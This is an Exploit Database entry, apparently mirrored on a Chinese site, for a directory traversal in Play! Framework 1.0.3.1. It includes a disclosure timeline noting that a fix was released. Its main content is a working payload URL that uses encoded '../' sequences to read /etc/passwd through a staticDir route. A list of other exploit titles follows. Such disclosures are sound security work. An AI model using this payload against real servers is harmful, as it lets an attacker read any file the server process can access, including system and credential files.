Play! Framework 1.0.3.1 – Directory Traversal

Exploit Database
16 阅读

作者： kripthor

日期： 2010-08-10
类别：
- remote
平台：
- multiple
来源：https://www.exploit-db.com/exploits/14602/

Exploit Title: Play! Framework <= 1.0.3.1 Directory Transversal Vulnerability
Date:July 24, 2010
Author:kripthor
Software Link: http://www.playframework.org/
Version: Play! Framework <= 1.0.3.1
Tested on: Ubuntu 10 
CVE :N/A
Notes: 28/07/2010 at 14:03 - Developer contacted
 28/07/2010 at 15:04 - Fix released
 10/08/2010 at 17:00 - Exploit published
References: 	 www.playframework.com


An attacker can download any file that the owner of the Play! process can read.

Simply browse to:

http://127.0.0.1:9000/public/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

The '/public' directory must be a directory with a 'staticDir' mapping in the 'conf/routes' configuration file. 
Typically an images or css directory on the server.

last Exploits
Play! Framework 1.0.3.1 – Directory Traversal的更多信息

KingView 6.5.3 – SCADA HMI Heap Overflow：
Netmechanica NetDecision Dashboard Server – Information Disclosure：
Trend Micro Control Manger 5.5 – ‘CmdProcessor.exe’ Remote Stack Buffer Overflow (Metasploit)：
BMC BladeLogic 8.3.00.64 – Remote Command Execution：
Ultra Mini HTTPd 1.21 – ‘POST’ Remote Stack Buffer Overflow (2)：
DeepOfix SMTP Server 3.3 – Authentication Bypass：
libguac – Remote Buffer Overflow：
Trend Micro OfficeScan – Remote Stack Buffer Overflow (Metasploit)：